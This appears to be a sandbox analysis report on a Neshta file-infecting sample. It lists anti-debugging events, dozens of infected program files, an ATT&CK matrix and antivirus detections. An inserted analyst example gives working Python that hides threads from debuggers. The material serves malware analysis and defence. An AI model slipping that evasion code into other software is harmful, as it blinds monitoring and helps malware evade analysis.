Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
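The two rows "Thread information set: HideFromDebugger" and "Process queried: DebugPort" correspond to NtSetInformationThread with ThreadHideFromDebugger (0x11) and NtQueryInformationProcess with ProcessDebugPort (7). The Python script below is an added example, not code from the report or the sample, that issues the same two native calls through ctypes so an analyst can reproduce them when checking whether a debugger or sandbox survives them: the query returns whether a debug port is attached to the current process, and the set call detaches the calling thread from any debugger for the rest of its life (a debugger that was stepping the thread loses it). Both functions return None on a non-Windows host so the module still imports there; the information-class values and call signatures are the documented ones from the Windows NT headers.

```python
import ctypes
import sys

# Information classes as defined in the NT headers (ntddk.h / winternl.h).
THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS ThreadHideFromDebugger
PROCESS_DEBUG_PORT = 7             # PROCESSINFOCLASS ProcessDebugPort
STATUS_SUCCESS = 0


def _ntdll():
    """Bind the two native calls with explicit prototypes; None when not on Windows."""
    if sys.platform != "win32":
        return None
    nt = ctypes.WinDLL("ntdll")
    # NTSTATUS NtSetInformationThread(HANDLE, THREADINFOCLASS, PVOID, ULONG)
    nt.NtSetInformationThread.argtypes = [ctypes.c_void_p, ctypes.c_ulong,
                                          ctypes.c_void_p, ctypes.c_ulong]
    nt.NtSetInformationThread.restype = ctypes.c_ulong
    # NTSTATUS NtQueryInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG)
    nt.NtQueryInformationProcess.argtypes = [ctypes.c_void_p, ctypes.c_ulong, ctypes.c_void_p,
                                             ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
    nt.NtQueryInformationProcess.restype = ctypes.c_ulong
    return nt


def query_debug_port():
    """True when a debug port is attached to this process, False when not,
    None when not running on Windows."""
    nt = _ntdll()
    if nt is None:
        return None
    k32 = ctypes.WinDLL("kernel32")
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    port = ctypes.c_size_t(0)          # DWORD_PTR DebugPort, non-zero when a debugger is attached
    returned = ctypes.c_ulong(0)
    status = nt.NtQueryInformationProcess(k32.GetCurrentProcess(), PROCESS_DEBUG_PORT,
                                          ctypes.byref(port), ctypes.sizeof(port),
                                          ctypes.byref(returned))
    if status != STATUS_SUCCESS:
        raise OSError(f"NtQueryInformationProcess failed: 0x{status:08X}")
    return port.value != 0


def hide_current_thread():
    """Apply ThreadHideFromDebugger to the calling thread. True on STATUS_SUCCESS,
    None when not running on Windows. Irreversible for the thread's lifetime."""
    nt = _ntdll()
    if nt is None:
        return None
    k32 = ctypes.WinDLL("kernel32")
    k32.GetCurrentThread.restype = ctypes.c_void_p
    status = nt.NtSetInformationThread(k32.GetCurrentThread(), THREAD_HIDE_FROM_DEBUGGER,
                                       None, 0)   # no buffer for this class
    return status == STATUS_SUCCESS


if __name__ == "__main__":
    print("debugger attached (ProcessDebugPort):", query_debug_port())
    print("thread hidden from debugger:", hide_current_thread())
```

Run it once under a debugger and once without: the first print flips, and after the second call the debugger no longer receives breakpoint or single-step events from that thread. This is what the sandbox recorded the sample doing, so a monitoring setup that relies on thread-level debug events will go blind at exactly that point; hooking NtSetInformationThread and dropping the 0x11 class is the usual countermeasure.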
Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: Z68mMCAxFZ.exe, 00000000.00000002.940244910.0000000000D70000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040D74C GetLocaleInfoA
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00403CB4 GetLocaleInfoA
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040F270 GetLocalTime
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId
Source: Z68mMCAxFZ.exe, 00000000.00000003.859433978.0000000002234000.00000004.00000001.sdmp | Binary or memory string: MSASCui.exe
Source: Z68mMCAxFZ.exe, 00000000.00000003.859433978.0000000002234000.00000004.00000001.sdmp | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information:

Yara detected Neshta
Source: Yara match | File source: Z68mMCAxFZ.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  GuLoader behavior detectedShow sources
                  Source: Initial fileSignature Results: GuLoader behavior

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation | Registry Run Keys / Startup Folder 1 | Process Injection 12 | Masquerading 22 | Input Capture 11 | System Time Discovery 1 | Taint Shared Content 1 | Input Capture 11 | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 21 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Security Software Discovery 42 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                  Behavior Graph

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  Z68mMCAxFZ.exe | 86% | Virustotal |
                  Z68mMCAxFZ.exe | 100% | Avira | W32/Neshta.A
                  Z68mMCAxFZ.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  Source | Detection | Scanner | Label
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Neshta.A
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Avira | W32/Neshta.A
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Joe Sandbox ML |
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Joe Sandbox ML |
